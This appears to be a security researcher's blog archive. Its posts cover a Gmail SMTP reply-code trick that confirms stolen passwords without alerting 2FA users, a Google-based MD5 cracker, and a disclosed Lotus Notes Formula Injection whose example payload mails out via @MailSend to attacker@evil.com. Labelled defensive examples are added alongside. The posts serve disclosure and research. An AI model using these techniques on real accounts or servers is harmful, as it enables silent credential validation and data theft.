Friday, September 19, 2014

Google and two factor authentication

A nice feature of Google two factor authentication is that it makes the user aware of potential account compromise. If an attacker captured your credentials and tried to access your email account through the usual Google web based portals, you would get an SMS notification as part of the two factor authentication.
However, a malicious user would want to validate that the credentials were correct while avoiding the two factor authentication SMS. This got me thinking about other ways I could attempt to authenticate to Google services without the user being aware of potential credential compromise: validating the credentials while preventing the two factor authentication notification, so that the legitimate user is not aware the credentials have been compromised.

I decided to test over SMTP. So, just using Java, I attempted authentication over SMTP. If you authenticate with invalid credentials you will get the following exception message:

Caused by: javax.mail.AuthenticationFailedException: 535-5.7.8 Username and Password not accepted. Learn more at
535 5.7.8 http://support.google.com/mail/bin/answer.py?answer=14257 wp7sm2528486wjc.12 - gsmtp

However, if you attempt to authenticate with the correct credentials but two factor authentication is configured on the account, you will get the following exception and no notification will be sent to the end user:

Caused by: javax.mail.AuthenticationFailedException: 534-5.7.9 Application-specific password required. Learn more at
534 5.7.9 http://support.google.com/accounts/bin/answer.py?answer=185833 bj7sm2504496wjc.33 - gsmtp

Despite the exception type being the same, you will notice there are differences in the error messages. Both are of course failed authentication attempts, but through subtle information leakage the latter tells me:

  • The credentials for the account are correct
  • Two factor authentication is in use
  • The legitimate user does not receive a 2FA notification and is therefore unaware the credentials have been compromised.
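The same distinction is what a mail administrator or a SIEM rule would key on: a 534 5.7.9 reply to AUTH means the password matched and the account is 2FA-protected, yet the account owner received nothing. As an added example (not code from the original post), the following Java classifies the two Gmail replies quoted above by their SMTP reply code (RFC 5321) and enhanced status code (RFC 3463), so that repeated 534 5.7.9 replies against one account can be alerted on; the fourth sample line is a constructed transient failure included to show it is classified as neither.

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

/**
 * Added example (not code from the original post): classifies failed SMTP AUTH
 * replies by reply code (RFC 5321) and enhanced status code (RFC 3463), using
 * the two Gmail replies quoted in the post as the known cases.
 */
public class SmtpAuthReplyClassifier {

    /** What a failed AUTH reply reveals about the account being tried. */
    public enum Verdict {
        BAD_CREDENTIALS,        // 535 5.7.8: username/password rejected
        VALID_CREDENTIALS_2FA,  // 534 5.7.9: password accepted, app-specific password required, owner not notified
        OTHER
    }

    // "535-5.7.8 text" (continuation line) or "535 5.7.8 text" (final line of the reply)
    private static final Pattern REPLY =
            Pattern.compile("\\b(\\d{3})[ -](\\d\\.\\d{1,3}\\.\\d{1,3})\\b");

    /** Accepts a raw reply line or a JavaMail AuthenticationFailedException message that contains one. */
    public static Verdict classify(String replyText) {
        Matcher m = REPLY.matcher(replyText);
        if (!m.find()) {
            return Verdict.OTHER;
        }
        String code = m.group(1);
        String enhanced = m.group(2);
        if ("535".equals(code) && "5.7.8".equals(enhanced)) {
            return Verdict.BAD_CREDENTIALS;
        }
        if ("534".equals(code) && "5.7.9".equals(enhanced)) {
            return Verdict.VALID_CREDENTIALS_2FA;
        }
        return Verdict.OTHER;
    }

    public static void main(String[] args) {
        String[] samples = {
            // The two replies quoted in the post
            "535-5.7.8 Username and Password not accepted. Learn more at",
            "534-5.7.9 Application-specific password required. Learn more at",
            // The same reply wrapped in the JavaMail exception message
            "Caused by: javax.mail.AuthenticationFailedException: 534-5.7.9 Application-specific password required.",
            // Constructed transient failure: must not be treated as either verdict
            "454 4.7.0 Temporary authentication failure"
        };
        for (String s : samples) {
            Verdict v = classify(s);
            // VALID_CREDENTIALS_2FA is the one worth alerting on: the password was
            // correct and the account owner received no notification.
            String tag = (v == Verdict.VALID_CREDENTIALS_2FA) ? "[ALERT] " : "[info]  ";
            System.out.println(tag + v + "  <- " + s);
        }
    }
}
```

Feeding the classifier the text of the AuthenticationFailedException (or the server's AUTH reply from a mail gateway log) is enough; the regex takes the first reply code it finds, so the exception prefix and the trailing message identifiers are ignored.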


Tuesday, October 22, 2013

T-Mobile API


I've pulled apart and analysed the My T-Mobile client, and put together a Java API. You can use it to access all kinds of details from an account, such as call records and data usage. The project and code can be found at:

https://code.google.com/p/tmobile-api/

Enjoy!

Sunday, September 22, 2013

Nectar / Sainsburys unofficial API

I love reversing mobile applications and finding out more about the "hidden" and undocumented web services they talk to, then designing and building my own rich Java APIs to interact with them. The latest I took a look at was the Nectar mobile application.

You can find my Nectar/Sainsburys Google Code project here.

Tuesday, July 3, 2012

NetBeans and Java Native Access

Accessing a native interface from Java is useful for a wide variety of reasons. The most common way to do this would be through the use of JNI. While it works well, it did feel a little fiddly and heavy to get the job done. That was until the Java Native Access (JNA) platform came along. It does a lot of the heavy lifting for you, allowing you to call native methods without doing any C/C++ development (unless you are writing your own dynamic library).

Below you can find my version of "HelloWorld" for JNA. This example calls the MessageBoxA function which is an export within User32.dll.

Firstly, create an interface for the native function:


package mywindows.java;

import com.sun.jna.Library;

public interface MyUser32 extends Library
{
      public int MessageBoxA(int handle, String message, String title, int type);
}

Then the invocation is straightforward:

package jnaworld;

import com.sun.jna.Native;
import mywindows.java.MyUser32;

public class JNAWorld {

    static {
        if (System.getProperty("jna.nosys") == null) {
            System.out.println("[*] Set new system property");
            System.setProperty("jna.nosys", "true");
        }
    }

    public static void main(String[] args) {

        String mytext = "Hello World!";
        String mytitle = "Title bar";

        String libName = "c";
        if (System.getProperty("os.name").contains("Windows")) {
            libName = "user32"; //loading user32.dll on the system
        }

        // Loading dynamically the library
        MyUser32 user32 = (MyUser32) Native.loadLibrary(libName, MyUser32.class);
        user32.MessageBoxA(0, mytext, mytitle, 0);
    }
}


Note: The code included in the static initializer may not be needed. I have included it in this example in case people are doing their development from NetBeans. As NetBeans ships with a version of JNA, you will want to ensure that the jar file that is used is the one you intend to ship with. If you include the static initializer it will prevent you from running into the following error that you would otherwise encounter:


Exception in thread "main" java.lang.Error: 

There is an incompatible JNA native library installed on this system.
To resolve this issue you may do one of the following:
 - remove or uninstall the offending library
 - set the system property jna.nosys=true
 - set jna.boot.library.path to include the path to the version of the 
   jnidispatch library included with the JNA jar file you are using
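JNAWorld above falls back to libName = "c" off Windows, but its MyUser32 interface only declares MessageBoxA, which libc does not export, so that branch would fail with an UnsatisfiedLinkError at call time. As an added example (not the post's code), the following declares a second interface for the C runtime and picks the interface to match the library it loads. It assumes JNA 5.x, where Native.load replaced Native.loadLibrary, and declares the HWND parameter as a Pointer rather than an int because window handles are pointer-sized on 64-bit Windows.

```java
package jnaworld;

import com.sun.jna.Library;
import com.sun.jna.Native;
import com.sun.jna.Platform;
import com.sun.jna.Pointer;

/**
 * Added example (not from the original post): the same JNA pattern, with one
 * interface per library so the function declared actually exists in the
 * library that gets loaded. Requires JNA 5.x on the classpath.
 */
public class JnaLibc {

    /** Functions exported by the C runtime (libc on Linux, libSystem on macOS). */
    public interface CLibrary extends Library {
        int getpid();
        int strlen(String s);   // JNA marshals the Java String as a NUL-terminated char*
    }

    /** The user32.dll export used by the original post. */
    public interface User32 extends Library {
        // HWND is pointer-sized; Pointer (null here) is the right width on 32- and 64-bit Windows.
        int MessageBoxA(Pointer hwnd, String text, String caption, int type);
    }

    public static void main(String[] args) {
        if (Platform.isWindows()) {
            User32 user32 = Native.load("user32", User32.class);
            user32.MessageBoxA(null, "Hello World!", "Title bar", 0);
        } else {
            // "c" resolves to the platform C library; no MessageBoxA here, so use libc symbols.
            CLibrary libc = Native.load("c", CLibrary.class);
            System.out.println("[*] pid=" + libc.getpid()
                    + " strlen(\"Hello World!\")=" + libc.strlen("Hello World!"));
        }
    }
}
```

The jna.nosys property from the post is still relevant when developing from NetBeans; it can be set on the command line (-Djna.nosys=true) instead of in a static initializer.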

Saturday, June 23, 2012

SABnzbd post processing script - virus scan

Using my VirusTotal API I've put together a post processing script for SABnzbd. The script will perform a recursive scan and search the VirusTotal site for each file. Again, no file content is uploaded; instead the cryptographic hash (SHA256) is submitted to VirusTotal. The results will be displayed on the SABnzbd interface through the "View script log" window.

The Google code project can be found here, along with the download ready to add in your script folder.

Enjoy!

VirusTotal search / scan

The VirusTotal site has some pretty cool functionality. Their search feature allows you to search using various terms. For example, you can search for malware results using cryptographic hashes. I've put together a Java API which allows developers to make use of this functionality. I've put all the code and API examples on my VirusTotal Google Code project page.
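As an added example of the hash-only lookup that the SABnzbd script and the VirusTotal post both describe (this is not the code from the author's VirusTotal or SABnzbd projects), the following walks a directory tree, computes a SHA-256 per file and queries VirusTotal's current v3 endpoint, GET /api/v3/files/{hash}, with the key in the x-apikey header. The environment variable name VT_API_KEY is a placeholder chosen here, not something the projects define; without it the hashes are still printed and the lookup is skipped, so the block runs offline. Note the caveat in lookup(): a 404 means VirusTotal has never seen the hash, which is not the same as the file being clean.

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.LinkedHashMap;
import java.util.List;
import java.util.Map;
import java.util.stream.Collectors;
import java.util.stream.Stream;

/**
 * Added example, not the author's VirusTotal/SABnzbd code. Hashes every file
 * under a directory with SHA-256 and looks the hash up on VirusTotal, so file
 * contents never leave the machine.
 */
public class HashLookupScanner {

    // Placeholder: the reader supplies the key via the environment.
    static final String VT_API_KEY = System.getenv("VT_API_KEY");

    /** SHA-256 of a file as lowercase hex, streamed so large downloads are not read into memory. */
    public static String sha256Hex(Path file) throws IOException {
        try {
            MessageDigest md = MessageDigest.getInstance("SHA-256");
            try (InputStream in = Files.newInputStream(file)) {
                byte[] buf = new byte[8192];
                int n;
                while ((n = in.read(buf)) > 0) {
                    md.update(buf, 0, n);
                }
            }
            StringBuilder sb = new StringBuilder();
            for (byte b : md.digest()) {
                sb.append(String.format("%02x", b));
            }
            return sb.toString();
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-256 missing from this JVM", e);
        }
    }

    /** Recursively hashes every regular file under root (symlinks are not followed). */
    public static Map<Path, String> hashTree(Path root) throws IOException {
        List<Path> files;
        try (Stream<Path> paths = Files.walk(root)) {
            files = paths.filter(Files::isRegularFile).collect(Collectors.toList());
        }
        Map<Path, String> hashes = new LinkedHashMap<>();
        for (Path p : files) {
            hashes.put(p, sha256Hex(p));
        }
        return hashes;
    }

    /**
     * Queries VirusTotal for a hash. 200 = known to VT, 404 = never seen (unknown,
     * not clean); other codes (e.g. 429 rate limit) are reported rather than
     * silently treated as a clean result.
     */
    public static String lookup(String sha256) throws IOException {
        URL url = new URL("https://www.virustotal.com/api/v3/files/" + sha256);
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setRequestProperty("x-apikey", VT_API_KEY);
        int status = conn.getResponseCode();
        switch (status) {
            case 200: return "known to VirusTotal (inspect last_analysis_stats in the JSON body)";
            case 404: return "not seen by VirusTotal (unknown, not clean)";
            default:  return "lookup failed, HTTP " + status;
        }
    }

    public static void main(String[] args) throws IOException {
        Path root = Paths.get(args.length > 0 ? args[0] : ".");
        for (Map.Entry<Path, String> e : hashTree(root).entrySet()) {
            String verdict = (VT_API_KEY == null)
                    ? "VT_API_KEY not set, lookup skipped"
                    : lookup(e.getValue());
            System.out.println(e.getValue() + "  " + e.getKey() + "  " + verdict);
        }
    }
}
```

Run it as `java HashLookupScanner /path/to/completed/download` with VT_API_KEY exported; a 200 reply still needs the JSON body parsed for last_analysis_stats before anything is called malicious.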

Saturday, December 24, 2011

Cracking MD5 with Google

It has been known for a long time now that Google can be used for all kinds of awesome things (Google query hacking etc), and hash cracking is one of them.

I thought I would share something I wrote last year to demonstrate how easy it is to crack MD5, just by using Google. This is easily adapted for use with other hashes, cracking SHA1 works well too. I've found the success rate to be extremely high. Enjoy :)

package md5crack;

import java.io.*;
import java.net.*;
import java.util.logging.*;
import org.apache.commons.codec.digest.DigestUtils;

/**
 *
 * @author Adam Boulton - Using Google to crack MD5
 */
public class MD5Crack {

    /**
     * @param args the command line arguments
     */
    public static void main(String[] args) {

        // An empty args array throws ArrayIndexOutOfBoundsException before
        // args[0] == null could ever be evaluated, so check the length instead,
        // and stop after printing usage rather than falling through.
        if (args.length == 0 || args[0].isEmpty())
        {
            System.out.println("-= Google MD5 Cracker =-");
            System.out.println("-= Adam Boulton - 2010 =- ");
            System.out.println("Usage: MD5crack <hash>");
            return;
        }

        // DigestUtils.md5Hex returns lowercase hex, so normalise the input hash.
        String hash = args[0].toLowerCase();
        String url = String.format("https://www.google.com/search?q=%s", hash);

        try {
            URL oracle = new URL(url);
            URLConnection conn = oracle.openConnection();

            //keep Google happy, otherwise connection refused.
            conn.setRequestProperty("user-agent", "Mozilla/5.0 Windows NT6.1 WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.63 Safari/535.7");

            BufferedReader in = new BufferedReader(
                    new InputStreamReader(
                    conn.getInputStream()));

            String inputLine;

            // Hash every whitespace-separated token in the result page and
            // compare it with the target hash.
            while ((inputLine = in.readLine()) != null) {
                String[] words = inputLine.split("\\s+");

                for (String word : words) {
                    String wordHash = DigestUtils.md5Hex(word);
                    if (wordHash.equals(hash)) {

                        System.out.println("[*] Found: " + word);
                        in.close();
                        System.exit(0);
                    }
                }
            }

            System.out.println("[!] No results.");
            in.close();

        } catch (IOException ex) {
            Logger.getLogger(MD5Crack.class.getName()).log(Level.SEVERE, null, ex);
        }
    }
}

Saturday, November 19, 2011

New security vulnerability: Lotus Notes Formula Injection

From time to time, I get an opportunity to do some independent research. Something that has always particularly piqued my interest is Lotus Notes environments, both the administration and the development platform. I feel what makes it an interesting environment is:

1. The focus is business applications
2. There has never been a significant focus from the IT security industry (Fortify doesn't even scan Lotus code)
3. My father happens to be a Lotus Notes Certified Developer.

These three points make an interesting recipe for security assessments.

Back in April 2010 I was having a usual tech talk with my dad about IT in general and software development practices. This is when I was introduced to the Domino Blog. Domino Blog is a Lotus Notes application offered by IBM as a weblog solution. It is generally intended for social media networking, allowing users to post topics and allow the general public to supply comments. This application is deployed within a Lotus Domino environment and is utilized by a wide audience, from IBM employees to the general public.

My dad happened to have this setup on one of his servers, so it was all ready to break. To speed things up, we moved straight onto a secure code review of the application. The scope of tainted data was fairly limited, so it didn't take long to identify all the entry points, which makes the assessment much easier.

There are interesting functions in LotusScript, but one in particular is the 'Evaluate' function, which allows a developer to build dynamic functionality by executing Lotus Notes Formula statements. For those who are familiar with other injection vulnerabilities (SQLi), I am sure the problem is becoming apparent.

It just so happens that in the Domino Blog there are Evaluate calls which act as a sink for data received from HTTP requests, without any encoding of that data. Moving straight on to an example payload, it would look like this:


http://lotusnotesblogdomain.co.uk/blog.nsf/archive?openview&title=Motorbikes&type=cat&cat=");
@MailSend("attacker@evil.com";"";"";"Formula%20Injection";
"The%20email%body%belongs%here");
@IsText("


The payload above would force the Domino server to issue mail. As the Evaluate function supports wrapping of formula functions, it is trivial to start pulling data from the server and get it delivered to an email account.

An attacker simply requires knowledge of how to correctly construct the statement to meet the requirements of the Evaluate function, and familiarity with the Formula language. As can be seen on the formula poster, there is extremely powerful functionality that can make the payloads extremely interesting, and can certainly result in total compromise of the Lotus Notes server. I've appropriately coined this vulnerability Lotus Notes Formula Injection :)

Certainly add this to your list for web app or source code reviews of a Domino application.

Note: This was all responsibly disclosed to IBM in April 2010.

Update: 24/12/2011 - I thought it was pretty cool to see this picked up by WhiteHat Security and put in Jeremiah Grossman's blogspot 
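To show the pattern behind the payload above from the application side, here is an added example (not the Domino Blog's code, which the post does not reproduce). The formula fragment @Contains(Category; "...") and the parameter name cat are assumed for illustration. The unsafe builder concatenates the request parameter into the formula source, exactly the sink the post describes; the safe builder escapes the two characters that Formula language treats specially inside a double-quoted literal (backslash and double quote), so a request value can no longer terminate the literal and append further @-function calls. Where the code can be restructured, the better fix is to hand the value to Evaluate through a field on a NotesDocument (Evaluate's optional second argument) and reference the field name in the formula, so user data never becomes formula source at all.

```java
/**
 * Added example, not from the original post: building a Formula statement from
 * a request parameter, unsafely and safely. The @Contains(Category; ...) fragment
 * and the "cat" parameter are assumed for illustration.
 */
public class FormulaInjectionDemo {

    /** Vulnerable: the request parameter becomes part of the formula source verbatim. */
    public static String buildFormulaUnsafe(String cat) {
        return "@Contains(Category; \"" + cat + "\")";
    }

    /**
     * Renders a value as a Formula-language string literal. Inside a
     * double-quoted literal a backslash escapes the next character, so both
     * backslash and double quote are prefixed with a backslash; backslash first,
     * so the escapes added for quotes are not themselves re-escaped.
     */
    public static String formulaLiteral(String value) {
        String escaped = value.replace("\\", "\\\\").replace("\"", "\\\"");
        return "\"" + escaped + "\"";
    }

    /** Hardened: the value can only ever be read as the contents of one string literal. */
    public static String buildFormulaSafe(String cat) {
        return "@Contains(Category; " + formulaLiteral(cat) + ")";
    }

    /** True when the value, embedded unsafely, would add a second statement (contains an unescaped quote). */
    public static boolean wouldBreakOut(String cat) {
        return cat.indexOf('"') >= 0;
    }

    public static void main(String[] args) {
        // Constructed injection attempt in the shape of the post's payload:
        // close the literal, run another @-function, reopen a literal to keep the syntax valid.
        String injected = "\"); @Today; @IsText(\"";
        String benign = "Motorbikes";

        System.out.println("benign   unsafe: " + buildFormulaUnsafe(benign));
        System.out.println("injected unsafe: " + buildFormulaUnsafe(injected)
                + (wouldBreakOut(injected) ? "   <- extra statement injected" : ""));
        System.out.println("injected safe:   " + buildFormulaSafe(injected));
    }
}
```

Running it prints the unsafe form as two statements, @Contains(Category; ""); @Today; @IsText(""), and the safe form as a single @Contains call whose literal holds the quote characters as \" escapes. For a source review, wouldBreakOut is the simplest grep-style check for values reaching Evaluate: any unescaped double quote in tainted data that reaches formula source is the finding.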

Wednesday, July 20, 2011

JavaPayload project

This is not one to be missed! It is very impressive, Michael (Mihi) has clearly worked hard on this, kudos to him!

http://javapayload.sourceforge.net/

Monday, July 18, 2011

Insecure coding examples

A really useful list of test cases is available from the DHS National Cyber Security Division:

http://samate.nist.gov/SRD/view.php